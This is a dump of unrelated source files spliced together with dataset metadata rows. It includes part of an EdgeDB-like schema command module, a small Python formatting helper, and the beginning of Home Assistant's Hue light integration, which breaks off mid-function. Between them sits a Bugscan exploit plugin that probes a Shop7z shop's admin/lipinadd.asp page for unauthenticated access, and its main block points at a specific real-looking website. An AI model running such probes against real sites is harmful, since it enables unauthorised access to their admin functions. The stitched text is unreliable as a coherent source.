context: sd.CommandContext,
) -> sd.ObjectCommandContext[so.Object]:
ctx = cls.get_referrer_context(context)
if ctx is None:
raise RuntimeError(f'no referrer context for {cls}')
return ctx
class StronglyReferencedObjectCommand(
ReferencedObjectCommandBase[ReferencedT]
):
pass
class ReferencedObjectCommand(ReferencedObjectCommandBase[ReferencedT]):
@classmethod
def _classname_from_ast(cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
context: sd.CommandContext
) -> sn.Name:
name = super()._classname_from_ast(schema, astnode, context)
parent_ctx = cls.get_referrer_context(context)
if parent_ctx is not None:
assert isinstance(parent_ctx.op, sd.QualifiedObjectCommand)
referrer_name = parent_ctx.op.classname
base_name: str
try:
base_ref = utils.ast_to_object(
astnode.name,
modaliases=context.modaliases,
schema=schema,
)
except errors.InvalidReferenceError:
base_name = sn.Name(name)
else:
base_name = base_ref.get_name(schema)
quals = cls._classname_quals_from_ast(
schema, astnode, base_name, referrer_name, context)
pnn = sn.get_specialized_name(base_name, referrer_name, *quals)
name = sn.Name(name=pnn, module=referrer_name.module)
assert isinstance(name, sn.Name)
return name
@classmethod
def _classname_from_name(
cls,
name: sn.SchemaName,
referrer_name: sn.SchemaName,
) -> sn.Name:
base_name = sn.shortname_from_fullname(name)
quals = cls._classname_quals_from_name(name)
pnn = sn.get_specialized_name(base_name, referrer_name, *quals)
return sn.Name(name=pnn, module=referrer_name.module)
@classmethod
def _classname_quals_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
base_name: str,
referrer_name: str,
context: sd.CommandContext,
) -> Tuple[str, ...]:
return ()
@classmethod
def _classname_quals_from_name(
cls,
name: sn.SchemaName,
) -> Tuple[str, ...]:
return ()
@classmethod
def _name_qual_from_exprs(cls,
schema: s_schema.Schema,
exprs: Iterable[str]) -> str:
m = hashlib.sha1()
for expr in exprs:
m.update(expr.encode())
return m.hexdigest()
def _get_ast_node(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> Type[qlast.DDLOperation]:
subject_ctx = self.get_referrer_context(context)
ref_astnode: Type[qlast.DDLOperation] = getattr(self,
'referenced_astnode',
None)
if subject_ctx is not None and ref_astnode is not None:
return ref_astnode
else:
if isinstance(self.astnode, (list, tuple)):
return self.astnode[1]
else:
return self.astnode
def _build_alter_cmd_stack(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: so.Object,
*,
referrer: Optional[so.Object] = None
) -> Tuple[sd.DeltaRoot, sd.Command]:
delta = sd.DeltaRoot()
if referrer is None:
assert isinstance(scls, ReferencedObject)
referrer = scls.get_referrer(schema)
obj = referrer
object_stack = []
if type(self) != type(referrer):
object_stack.append(referrer)
while obj is not None:
if isinstance(obj, ReferencedObject):
obj = obj.get_referrer(schema)
object_stack.append(obj)
else:
obj = None
cmd: sd.Command = delta
for obj in reversed(object_stack):
assert obj is not None
alter_cmd_cls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, type(obj))
alter_cmd = alter_cmd_cls(classname=obj.get_name(schema))
cmd.add(alter_cmd)
cmd = alter_cmd
return delta, cmd
class CreateReferencedObject(
ReferencedObjectCommand[ReferencedT],
sd.CreateObject[ReferencedT],
):
referenced_astnode: ClassVar[Type[qlast.ObjectDDL]]
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> sd.Command:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
if isinstance(astnode, cls.referenced_astnode):
objcls = cls.get_schema_metaclass()
referrer_ctx = cls.get_referrer_context_or_die(context)
referrer_class = referrer_ctx.op.get_schema_metaclass()
referrer_name = referrer_ctx.op.classname
refdict = referrer_class.get_refdict_for_class(objcls)
cmd.set_attribute_value(
refdict.backref_attr,
so.ObjectShell(
name=referrer_name,
schemaclass=referrer_class,
),
)
cmd.set_attribute_value('is_local', True)
if getattr(astnode, 'is_abstract', None):
cmd.set_attribute_value('is_abstract', True)
return cmd
def _get_ast_node(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> Type[qlast.DDLOperation]:
scls = self.get_object(schema, context)
assert isinstance(scls, ReferencedInheritingObject)
implicit_bases = scls.get_implicit_bases(schema)
if implicit_bases and not context.declarative:
mcls = self.get_schema_metaclass()
Alter = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, mcls)
alter = Alter(classname=self.classname)
return alter._get_ast_node(schema, context)
else:
return super()._get_ast_node(schema, context)
@classmethod
def as_inherited_ref_cmd(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
astnode: qlast.ObjectDDL,
parents: Any) -> sd.Command:
cmd = cls(classname=cls._classname_from_ast(schema, astnode, context))
cmd.set_attribute_value('name', cmd.classname)
return cmd
@classmethod
def as_inherited_ref_ast(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
name: str,
parent: ReferencedObject) -> qlast.ObjectDDL:
nref = cls.get_inherited_ref_name(schema, context, parent, name)
astnode_cls = cls.referenced_astnode
astnode = astnode_cls(name=nref)
assert isinstance(astnode, qlast.ObjectDDL)
return astnode
@classmethod
def get_inherited_ref_name(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
parent: ReferencedObject,
name: str
) -> qlast.ObjectRef:
# reduce name to shortname
if sn.Name.is_qualified(name):
shortname: str = sn.shortname_from_fullname(sn.Name(name))
else:
shortname = name
nref = qlast.ObjectRef(
name=shortname,
module=parent.get_shortname(schema).module,
)
return nref
def _create_innards(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
referrer_ctx = self.get_referrer_context(context)
if referrer_ctx is None:
return super()._create_innards(schema, context)
else:
referrer = referrer_ctx.scls
schema = self._create_ref(schema, context, referrer)
return super()._create_innards(schema, context)
def _create_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
referrer_cls = type(referrer)
mcls = type(self.scls)
refdict = referrer_cls.get_refdict_for_class(mcls)
schema = referrer.add_classref(schema, refdict.attr, self.scls)
return schema
class DeleteReferencedObjectCommand(
ReferencedObjectCommand[ReferencedT],
sd.DeleteObject[ReferencedT],
):
def _delete_innards(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
schema = super()._delete_innards(schema, context)
referrer_ctx = self.get_referrer_context(context)
if referrer_ctx is None:
return schema
else:
referrer = referrer_ctx.scls
schema = self._delete_ref(schema, context, referrer)
return schema
def _delete_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
scls = self.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
return referrer.del_classref(schema, refdict.attr, refname)
class ReferencedInheritingObjectCommand(
ReferencedObjectCommand[ReferencedInheritingObjectT],
inheriting.InheritingObjectCommand[ReferencedInheritingObjectT],
):
def _get_implicit_ref_bases(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.InheritingObject,
referrer_field: str,
fq_name: sn.SchemaName,
) -> List[ReferencedInheritingObjectT]:
assert isinstance(referrer, so.QualifiedObject)
child_referrer_bases = referrer.get_bases(schema).objects(schema)
implicit_bases = []
ref_field_type = type(referrer).get_field(referrer_field).type
for ref_base in child_referrer_bases:
fq_name_in_child = self._classname_from_name(
fq_name, ref_base.get_name(schema))
refname = ref_field_type.get_key_for_name(schema, fq_name_in_child)
parent_coll = ref_base.get_field_value(schema, referrer_field)
parent_item = parent_coll.get(schema, refname, default=None)
if (parent_item is not None
and not parent_item.get_is_final(schema)):
implicit_bases.append(parent_item)
return implicit_bases
def get_ref_implicit_base_delta(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refcls: ReferencedInheritingObjectT,
implicit_bases: List[ReferencedInheritingObjectT],
) -> inheriting.BaseDelta_T:
child_bases = refcls.get_bases(schema).objects(schema)
default_base = refcls.get_default_base_name()
explicit_bases = [
b for b in child_bases
if b.generic(schema) and b.get_name(schema) != default_base
]
new_bases = implicit_bases + explicit_bases
return inheriting.delta_bases(
[b.get_name(schema) for b in child_bases],
[b.get_name(schema) for b in new_bases],
)
def _validate(
self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> None:
scls = self.scls
implicit_bases = [
b for b in scls.get_bases(schema).objects(schema)
if not b.generic(schema)
]
referrer_ctx = self.get_referrer_context_or_die(context)
objcls = self.get_schema_metaclass()
referrer_class = referrer_ctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
if context.declarative and scls.get_is_local(schema):
if (implicit_bases
and refdict.requires_explicit_overloaded
and not self.get_attribute_value('declared_overloaded')):
ancestry = []
for obj in implicit_bases:
bref = obj.get_referrer(schema)
assert bref is not None
ancestry.append(bref)
raise errors.SchemaDefinitionError(
f'{self.scls.get_verbosename(schema, with_parent=True)} '
f'must be declared using the `overloaded` keyword because '
f'it is defined in the following ancestor(s): '
f'{", ".join(a.get_shortname(schema) for a in ancestry)}',
context=self.source_context,
)
elif (not implicit_bases
and self.get_attribute_value('declared_overloaded')):
raise errors.SchemaDefinitionError(
f'{self.scls.get_verbosename(schema, with_parent=True)}: '
f'cannot be declared `overloaded` as there are no '
f'ancestors defining it.',
context=self.source_context,
)
def _propagate_ref_op(self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: ReferencedInheritingObject,
cb: Callable[[sd.Command, str], None]
) -> s_schema.Schema:
rec = context.current().enable_recursion
context.current().enable_recursion = False
referrer_ctx = self.get_referrer_context_or_die(context)
referrer = referrer_ctx.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
r_alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, referrer_class)
alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, mcls)
for descendant in scls.ordered_descendants(schema):
d_name = descendant.get_name(schema)
assert isinstance(descendant, ReferencedObject)
d_referrer = descendant.get_referrer(schema)
assert d_referrer is not None
d_alter_cmd = alter_cmdcls(classname=d_name)
r_alter_cmd = r_alter_cmdcls(
classname=d_referrer.get_name(schema))
with r_alter_cmd.new_context(schema, context, d_referrer):
with d_alter_cmd.new_context(schema, context, descendant):
cb(d_alter_cmd, refname)
r_alter_cmd.add(d_alter_cmd)
schema = r_alter_cmd.apply(schema, context)
self.add(r_alter_cmd)
context.current().enable_recursion = rec
return schema
class CreateReferencedInheritingObject(
CreateReferencedObject[ReferencedInheritingObjectT],
inheriting.CreateInheritingObject[ReferencedInheritingObjectT],
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
):
def _get_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
refctx = type(self).get_referrer_context(context)
if refctx is not None:
if not self.get_attribute_value('is_local'):
if context.descriptive_mode:
astnode = super()._get_ast(
schema,
context,
parent_node=parent_node,
)
assert astnode is not None
inherited_from = [
sn.quals_from_fullname(b)[0]
for b in self.get_implicit_bases(
schema,
context,
self.get_attribute_value('bases'),
)
]
astnode.system_comment = (
f'inherited from {", ".join(inherited_from)}'
)
return astnode
else:
return None
else:
astnode = super()._get_ast(
schema, context, parent_node=parent_node)
if context.declarative:
scls = self.get_object(schema, context)
assert isinstance(scls, ReferencedInheritingObject)
implicit_bases = scls.get_implicit_bases(schema)
objcls = self.get_schema_metaclass()
referrer_class = refctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
if refdict.requires_explicit_overloaded and implicit_bases:
assert astnode is not None
astnode.declared_overloaded = True
return astnode
else:
return super()._get_ast(schema, context, parent_node=parent_node)
def _create_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
referrer_ctx = self.get_referrer_context(context)
implicit_bases = None
if referrer_ctx is not None and not context.canonical:
objcls = self.get_schema_metaclass()
referrer = referrer_ctx.scls
if isinstance(referrer, so.InheritingObject):
referrer_class = referrer_ctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
implicit_bases = self._get_implicit_ref_bases(
schema, context, referrer, refdict.attr, self.classname)
if implicit_bases:
bases = self.get_attribute_value('bases')
if bases:
bases = so.ObjectList.create(
schema,
implicit_bases + [
b for b in bases.objects(schema)
if b not in implicit_bases
],
)
else:
bases = so.ObjectList.create(
schema,
implicit_bases,
)
self.set_attribute_value('bases', bases)
schema = super()._create_begin(schema, context)
if referrer_ctx is not None and not context.canonical:
self._validate(schema, context)
return schema
def _create_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
schema = super()._create_ref(schema, context, referrer)
if (not self.scls.get_is_final(schema)
and isinstance(referrer, so.InheritingObject)
and not context.canonical
and context.enable_recursion):
# Propagate the creation of a new ref to descendants of
# our referrer.
schema = self._propagate_ref_creation(schema, context, referrer)
return schema
def _propagate_ref_creation(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.InheritingObject,
) -> s_schema.Schema:
get_cmd = sd.ObjectCommandMeta.get_command_class_or_die
mcls = type(self.scls)
referrer_cls = type(referrer)
alter_cmd = get_cmd(sd.AlterObject, referrer_cls)
ref_create_cmd = get_cmd(sd.CreateObject, mcls)
ref_alter_cmd = get_cmd(sd.AlterObject, mcls)
ref_rebase_cmd = get_cmd(inheriting.RebaseInheritingObject, mcls)
assert issubclass(ref_create_cmd, CreateReferencedInheritingObject)
assert issubclass(ref_rebase_cmd, RebaseReferencedInheritingObject)
refdict = referrer_cls.get_refdict_for_class(mcls)
parent_fq_refname = self.scls.get_name(schema)
for child in referrer.children(schema):
if not child.allow_ref_propagation(schema, context, refdict):
continue
alter = alter_cmd(classname=child.get_name(schema))
with alter.new_context(schema, context, child):
# This is needed to get the correct inherited name which will
# either be created or rebased.
ref_field_type = type(child).get_field(refdict.attr).type
refname = ref_field_type.get_key_for_name(
schema, parent_fq_refname)
astnode = ref_create_cmd.as_inherited_ref_ast(
schema, context, refname, self.scls)
fq_name = self._classname_from_ast(schema, astnode, context)
# We cannot check for ref existence in this child at this
# time, because it might get created in a sibling branch
# of the delta tree. Instead, generate a command group
# containing Alter(if_exists) and Create(if_not_exists)
# to postpone that check until the application time.
ref_create = ref_create_cmd.as_inherited_ref_cmd(
schema, context, astnode, [self.scls])
ref_create.if_not_exists = True
ref_create.set_attribute_value(refdict.backref_attr, child)
if child.get_is_derived(schema):
# All references in a derived object must
# also be marked as derived, to be consistent
# with derive_subtype().
ref_create.set_attribute_value('is_derived', True)
ref_alter = ref_alter_cmd(classname=fq_name, if_exists=True)
ref_alter.add(ref_rebase_cmd(
classname=fq_name,
implicit=True,
added_bases=(),
removed_bases=(),
))
alter.add(ref_alter)
alter.add(ref_create)
self.add(alter)
return schema
def get_implicit_bases(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
bases: Any,
) -> Sequence[str]:
mcls = self.get_schema_metaclass()
default_base = mcls.get_default_base_name()
if isinstance(bases, so.ObjectCollectionShell):
base_names = [
b.name for b in bases.items if b.name is not None
]
else:
assert isinstance(bases, so.ObjectList)
base_names = list(bases.names(schema))
# Filter out explicit bases
implicit_bases = [
b
for b in base_names
if (
b != default_base
and isinstance(b, sn.SchemaName)
and sn.shortname_from_fullname(b) != b
)
]
return implicit_bases
class AlterReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
inheriting.AlterInheritingObject[ReferencedInheritingObjectT],
):
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> AlterReferencedInheritingObject[ReferencedInheritingObjectT]:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
refctx = cls.get_referrer_context(context)
if refctx is not None:
cmd.set_attribute_value('is_local', True)
assert isinstance(cmd, AlterReferencedInheritingObject)
return cmd
def _alter_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
scls = self.scls
was_local = scls.get_is_local(schema)
schema = super()._alter_begin(schema, context)
now_local = scls.get_is_local(schema)
if not was_local and now_local:
self._validate(schema, context)
return schema
class RebaseReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
inheriting.RebaseInheritingObject[ReferencedInheritingObjectT],
):
implicit = struct.Field(bool, default=False)
def apply(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
if not context.canonical and self.implicit:
mcls = self.get_schema_metaclass()
refctx = self.get_referrer_context_or_die(context)
referrer = refctx.scls
assert isinstance(referrer, so.InheritingObject)
refdict = type(referrer).get_refdict_for_class(mcls)
implicit_bases = self._get_implicit_ref_bases(
schema,
context,
referrer=referrer,
referrer_field=refdict.attr,
fq_name=self.classname,
)
scls = self.get_object(schema, context)
removed_bases, added_bases = self.get_ref_implicit_base_delta(
schema,
context,
scls,
implicit_bases=implicit_bases,
)
self.added_bases = added_bases
self.removed_bases = removed_bases
return super().apply(schema, context)
class RenameReferencedInheritingObject(
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
sd.RenameObject,
):
def _rename_begin(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> s_schema.Schema:
orig_schema = schema
schema = super()._rename_begin(schema, context)
scls = self.scls
if not context.canonical and not scls.generic(schema):
implicit_bases = scls.get_implicit_bases(schema)
non_renamed_bases = set(implicit_bases) - context.renamed_objs
# This object is inherited from one or more ancestors that
# are not renamed in the same op, and this is an error.
if non_renamed_bases:
bases_str = ', '.join(
b.get_verbosename(schema, with_parent=True)
for b in non_renamed_bases
)
verb = 'are' if len(non_renamed_bases) > 1 else 'is'
vn = scls.get_verbosename(orig_schema)
raise errors.SchemaDefinitionError(
f'cannot rename inherited {vn}',
details=(
f'{vn} is inherited from '
f'{bases_str}, which {verb} not being renamed'
),
context=self.source_context,
)
if context.enable_recursion:
schema = self._propagate_ref_rename(schema, context, scls)
else:
for op in self.get_subcommands(type=sd.ObjectCommand):
schema = op.apply(schema, context)
return schema
def _propagate_ref_rename(self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: ReferencedInheritingObject
) -> s_schema.Schema:
rename_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.RenameObject, type(scls))
def _ref_rename(alter_cmd: sd.Command,
refname: str) -> None:
astnode = rename_cmdcls.astnode(
new_name=qlast.ObjectRef(
name=refname,
),
)
rename_cmd = rename_cmdcls._rename_cmd_from_ast(
schema, astnode, context)
alter_cmd.add(rename_cmd)
return self._propagate_ref_op(schema, context, scls, cb=_ref_rename)
class DeleteReferencedInheritingObject(
DeleteReferencedObjectCommand[ReferencedInheritingObjectT],
inheriting.DeleteInheritingObject[ReferencedInheritingObjectT],
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
):
def _delete_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
scls = self.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
self_name = self.scls.get_name(schema)
schema = referrer.del_classref(schema, refdict.attr, refname)
if (isinstance(referrer, so.InheritingObject)
and not context.canonical):
if (not context.in_deletion(offset=1)
and not context.disable_dep_verification):
implicit_bases = set(self._get_implicit_ref_bases(
schema, context, referrer, refdict.attr, self_name))
deleted_bases = set()
for ctx in context.stack:
if isinstance(ctx.op, type(self)):
deleted_bases.add(ctx.op.scls)
implicit_bases -= deleted_bases
if implicit_bases:
# Cannot remove inherited objects.
vn = scls.get_verbosename(schema, with_parent=True)
parents = [
b.get_field_value(schema, refdict.backref_attr)
for b in implicit_bases
]
pnames = '\n- '.join(
p.get_verbosename(schema, with_parent=True)
for p in parents
)
raise errors.SchemaError(
f'cannot drop inherited {vn}',
context=self.source_context,
details=f'{vn} is inherited from:\n- {pnames}'
)
alter_cmd = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, referrer_class)
for child in referrer.children(schema):
assert isinstance(child, so.QualifiedObject)
child_coll = child.get_field_value(schema, refdict.attr)
fq_refname_in_child = self._classname_from_name(
self_name,
child.get_name(schema),
)
child_refname = reftype.get_key_for_name(
schema, fq_refname_in_child)
existing = child_coll.get(schema, child_refname, None)
if existing is not None:
alter = alter_cmd(classname=child.get_name(schema))
with alter.new_context(schema, context, child):
schema, cmd = self._propagate_ref_deletion(
schema, context, refdict, child, existing)
alter.add(cmd)
self.add(alter)
return schema
def _propagate_ref_deletion(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refdict: so.RefDict,
child: so.InheritingObject,
child_ref: ReferencedInheritingObjectT,
) -> Tuple[s_schema.Schema, sd.Command]:
get_cmd = sd.ObjectCommandMeta.get_command_class_or_die
mcls = type(self.scls)
name = child_ref.get_name(schema)
implicit_bases = self._get_implicit_ref_bases(
schema, context, child, refdict.attr, name)
cmd: sd.Command
if child_ref.get_is_local(schema) or implicit_bases:
# Child is either defined locally or is inherited
# from another parent, so we need to do a rebase.
removed_bases, added_bases = self.get_ref_implicit_base_delta(
schema, context, child_ref, implicit_bases)
rebase_cmd_cls = get_cmd(inheriting.RebaseInheritingObject, mcls)
rebase_cmd = rebase_cmd_cls(
classname=name,
added_bases=added_bases,
removed_bases=removed_bases,
)
ref_alter_cmd = get_cmd(sd.AlterObject, mcls)
cmd = ref_alter_cmd(classname=name)
cmd.add(rebase_cmd)
else:
# The ref in child should no longer exist.
ref_del_cmd = get_cmd(sd.DeleteObject, mcls)
cmd = ref_del_cmd(classname=name)
schema = cmd.apply(schema, context)
return schema, cmd
| 1.679688 | 2 |
tools.py | Jakuko99/effectb | 1 | 3460 | from calendar import month_name
class Tools:
def __init__(self):
self.output = ""
def formatDate(self, date):
elements = date.split("-")
return f"{elements[2]}. {month_name[int(elements[1])]} {elements[0]}"
def shortenText(self, string, n): #return first n sentences from string
first = string.find(".")
for _ in range(n - 1):
if not string.find(".", first + 1) == -1:
first = string.find(".", first + 1)
return f"{string[:first-len(string)]}."
def tupleUnpack(self, tup):
self.output = ""
for item in tup:
self.output += f"{item} "
return self.output[:-1]
def joinList(self, list):
self.output = ""
for item in list:
self.output += f"{item}, "
return self.output[:-2] #remove last ', '
def partialJoin(self, list, n):
self.output = ""
i = 0
for item in list:
self.output += f"{item}, "
i += 1
if i >= n:
break
return self.output[:-2]
def processFilmography(self, list, n):
self.output = ""
i = 0
for item in list:
if 'year' in item:
self.output += f"{item['title']} ({item['year']}), "
else:
self.output += f"{item['title'].replace(' ()', '')}, "
i += 1
if i >= n:
break
return self.output[:-2]
def convertTime(self, runtime):
time = int(runtime)
mins = time % 60
hours = int(time / 60)
if hours >= 1:
return f"{hours} h {mins} min"
else:
return f"{mins} min" | 3.34375 | 3 |
Bugscan_exploits-master/exp_list/exp-2307.py | csadsl/poc_exp | 11 | 3461 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 烽火戏诸侯
#_PlugName_ = Shop7z /admin/lipinadd.asp越权访问
import re
def assign(service, arg):
if service == "shop7z":
return True, arg
def audit(arg):
payload = 'admin/lipinadd.asp'
target = arg + payload
code, head,res, errcode, _ = curl.curl2(target)
if code == 200 and 'name="lipinname"' in res and 'name="showflag"' in res:
security_hole(target)
if __name__ == '__main__':
from dummy import *
audit(assign('shop7z', 'http://www.99ysbjw.com/')[1]) | 2.09375 | 2 |
homeassistant/components/hue/light.py | dlangerm/core | 5 | 3462 | """Support for the Philips Hue lights."""
from __future__ import annotations
from datetime import timedelta
from functools import partial
import logging
import random
import aiohue
import async_timeout
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_FLASH,
ATTR_HS_COLOR,
ATTR_TRANSITION,
EFFECT_COLORLOOP,
EFFECT_RANDOM,
FLASH_LONG,
FLASH_SHORT,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_FLASH,
SUPPORT_TRANSITION,
LightEntity,
)
from homeassistant.core import callback
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import (
CoordinatorEntity,
DataUpdateCoordinator,
UpdateFailed,
)
from homeassistant.util import color
from .const import (
DOMAIN as HUE_DOMAIN,
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_LIGHT_SOURCE,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_ROOM,
REQUEST_REFRESH_DELAY,
)
from .helpers import remove_devices
SCAN_INTERVAL = timedelta(seconds=5)
_LOGGER = logging.getLogger(__name__)
SUPPORT_HUE_ON_OFF = SUPPORT_FLASH | SUPPORT_TRANSITION
SUPPORT_HUE_DIMMABLE = SUPPORT_HUE_ON_OFF | SUPPORT_BRIGHTNESS
SUPPORT_HUE_COLOR_TEMP = SUPPORT_HUE_DIMMABLE | SUPPORT_COLOR_TEMP
SUPPORT_HUE_COLOR = SUPPORT_HUE_DIMMABLE | SUPPORT_EFFECT | SUPPORT_COLOR
SUPPORT_HUE_EXTENDED = SUPPORT_HUE_COLOR_TEMP | SUPPORT_HUE_COLOR
SUPPORT_HUE = {
"Extended color light": SUPPORT_HUE_EXTENDED,
"Color light": SUPPORT_HUE_COLOR,
"Dimmable light": SUPPORT_HUE_DIMMABLE,
"On/Off plug-in unit": SUPPORT_HUE_ON_OFF,
"Color temperature light": SUPPORT_HUE_COLOR_TEMP,
}
ATTR_IS_HUE_GROUP = "is_hue_group"
GAMUT_TYPE_UNAVAILABLE = "None"
# Minimum Hue Bridge API version to support groups
# 1.4.0 introduced extended group info
# 1.12 introduced the state object for groups
# 1.13 introduced "any_on" to group state objects
GROUP_MIN_API_VERSION = (1, 13, 0)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Old way of setting up Hue lights.
Can only be called when a user accidentally mentions hue platform in their
config. But even in that case it would have been ignored.
"""
def create_light(item_class, coordinator, bridge, is_group, rooms, api, item_id):
"""Create the light."""
api_item = api[item_id]
if is_group:
supported_features = 0
for light_id in api_item.lights:
if light_id not in bridge.api.lights:
continue
light = bridge.api.lights[light_id]
supported_features |= SUPPORT_HUE.get(light.type, SUPPORT_HUE_EXTENDED)
supported_features = supported_features or SUPPORT_HUE_EXTENDED
else:
supported_features = SUPPORT_HUE.get(api_item.type, SUPPORT_HUE_EXTENDED)
return item_class(
coordinator, bridge, is_group, api_item, supported_features, rooms
)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Hue lights from a config entry."""
bridge = hass.data[HUE_DOMAIN][config_entry.entry_id]
api_version = tuple(int(v) for v in bridge.api.config.apiversion.split("."))
rooms = {}
allow_groups = bridge.allow_groups
supports_groups = api_version >= GROUP_MIN_API_VERSION
if allow_groups and not supports_groups:
_LOGGER.warning("Please update your Hue bridge to support groups")
light_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="light",
update_method=partial(async_safe_fetch, bridge, bridge.api.lights.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
# First do a refresh to see if we can reach the hub.
# Otherwise we will declare not ready.
await light_coordinator.async_refresh()
if not light_coordinator.last_update_success:
raise PlatformNotReady
if not supports_groups:
update_lights_without_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
None,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_without_group_support)
)
return
group_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="group",
update_method=partial(async_safe_fetch, bridge, bridge.api.groups.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
if allow_groups:
update_groups = partial(
async_update_items,
bridge,
bridge.api.groups,
{},
async_add_entities,
partial(create_light, HueLight, group_coordinator, bridge, True, None),
None,
)
bridge.reset_jobs.append(group_coordinator.async_add_listener(update_groups))
cancel_update_rooms_listener = None
@callback
def _async_update_rooms():
"""Update rooms."""
nonlocal cancel_update_rooms_listener
rooms.clear()
for item_id in bridge.api.groups:
group = bridge.api.groups[item_id]
if group.type != GROUP_TYPE_ROOM:
continue
for light_id in group.lights:
rooms[light_id] = group.name
# Once we do a rooms update, we cancel the listener
# until the next time lights are added
bridge.reset_jobs.remove(cancel_update_rooms_listener)
cancel_update_rooms_listener() # pylint: disable=not-callable
cancel_update_rooms_listener = None
@callback
def _setup_rooms_listener():
nonlocal cancel_update_rooms_listener
if cancel_update_rooms_listener is not None:
# If there are new lights added before _async_update_rooms
# is called we should not add another listener
return
cancel_update_rooms_listener = group_coordinator.async_add_listener(
_async_update_rooms
)
bridge.reset_jobs.append(cancel_update_rooms_listener)
_setup_rooms_listener()
await group_coordinator.async_refresh()
update_lights_with_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
_setup_rooms_listener,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_with_group_support)
)
update_lights_with_group_support()
async def async_safe_fetch(bridge, fetch_method):
"""Safely fetch data."""
try:
with async_timeout.timeout(4):
